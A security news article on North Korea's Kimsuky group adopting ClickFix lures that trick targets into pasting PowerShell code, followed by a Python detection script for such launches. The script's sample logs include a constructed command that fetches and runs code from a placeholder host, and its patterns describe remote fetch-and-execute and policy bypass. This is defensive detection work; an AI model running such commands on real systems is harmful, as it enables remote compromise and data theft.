North Korean Hacker Group Uses ClickFix Tactics in Targeted Espionage

March 19, 2025

North Korean state-backed hacker group Kimsuky (also known as Emerald Sleet or Velvet Chollima) has adopted a new cyberattack method inspired by the widely used ClickFix tactics.

Bill Toulas, reporting in BleepingComputer, explains that ClickFix is a social engineering method that manipulates victims into executing malicious code, often through PowerShell commands, leading to malware infections.

According to Microsoft’s Threat Intelligence team, this tactic marks a shift in Kimsuky’s approach to compromising espionage targets.

ClickFix tactics have become popular among cybercriminals for distributing infostealer malware. The attack involves fake error messages or system prompts that convince victims to run malicious PowerShell commands to fix technical issues.

Kimsuky’s variant builds on this method by impersonating South Korean government officials to establish trust with victims. Once trust is established, the attacker sends a spear-phishing email containing a PDF attachment.

When the target tries to open the document, they are redirected to a fake device registration link instructing them to run PowerShell as an administrator and paste attacker-provided code. This allows the installation of a remote desktop tool, registration of the victim’s device with a remote server, and direct data exfiltration.

Microsoft has observed Kimsuky’s use of this tactic in limited attacks since January 2025, targeting individuals working in international affairs organizations, NGOs, government agencies, and media companies across North America, South America, Europe, and East Asia.

Microsoft has notified affected customers and warned others to remain cautious about unsolicited communications. The adoption of ClickFix by a nation-state actor highlights how effective this social engineering technique has become in espionage operations.

Law departments and firms handling sensitive information, particularly in government or international affairs, should be aware of evolving social engineering tactics like ClickFix.

Staff should receive training on recognizing spear-phishing attempts and the dangers of executing code from unsolicited messages. Implementing multi-factor authentication, endpoint monitoring, and regular security audits can help mitigate the risk of such attacks.
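The endpoint monitoring mentioned above can be made concrete by checking process-creation telemetry for the pattern the article describes: an elevated PowerShell started from the user's desktop shell with a pasted command that fetches and runs remote code. The following is an added example (not from the article or from Microsoft); it runs a simple heuristic over constructed, Sysmon-style records in a key=value format, and the hostname device-reg.invalid is a placeholder.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_LOGS = [
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\Windows\\explorer.exe IntegrityLevel=High '
    'CommandLine="powershell -w hidden -ep bypass -c irm https://device-reg.invalid/x | iex"',
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage="C:\\Program Files\\Editor\\code.exe" IntegrityLevel=Medium '
    'CommandLine="powershell -NoProfile -File build.ps1"',
    'EventID=1 Image=C:\\Windows\\System32\\svchost.exe '
    'ParentImage=C:\\Windows\\System32\\services.exe IntegrityLevel=System '
    'CommandLine="C:\\Windows\\System32\\svchost.exe -k netsvcs"',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Command-line traits commonly seen in pasted "fix" commands; each adds one reason.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)?\s+bypass", re.I),
    "remote_fetch_and_exec": re.compile(
        r"\b(?:irm|iwr|invoke-(?:webrequest|restmethod)|downloadstring)\b.*"
        r"\b(?:iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def parse_record(line):
    """Turn one key=value record into a dict, stripping quotes around values."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def clickfix_reasons(rec):
    """Return the list of reasons a PowerShell launch looks ClickFix-like."""
    reasons = []
    if not rec.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    parent = rec.get("ParentImage", "").lower()
    # Run-as-administrator from the desktop shell is how the victim is told to start it.
    if parent.endswith("explorer.exe") and rec.get("IntegrityLevel") == "High":
        reasons.append("elevated_from_user_shell")
    cmd = rec.get("CommandLine", "")
    reasons += [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return reasons

def find_clickfix_candidates(lines, min_reasons=2):
    """Flag records with at least min_reasons traits for analyst review."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        reasons = clickfix_reasons(rec)
        if len(reasons) >= min_reasons:
            hits.append((rec.get("CommandLine", ""), reasons))
    return hits

if __name__ == "__main__":
    for cmd, why in find_clickfix_candidates(SAMPLE_LOGS):
        print(f"SUSPECT: {cmd}\n  reasons: {', '.join(why)}")
```

Only the first constructed record is flagged; a developer running a build script and a system service host both fall below the threshold.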
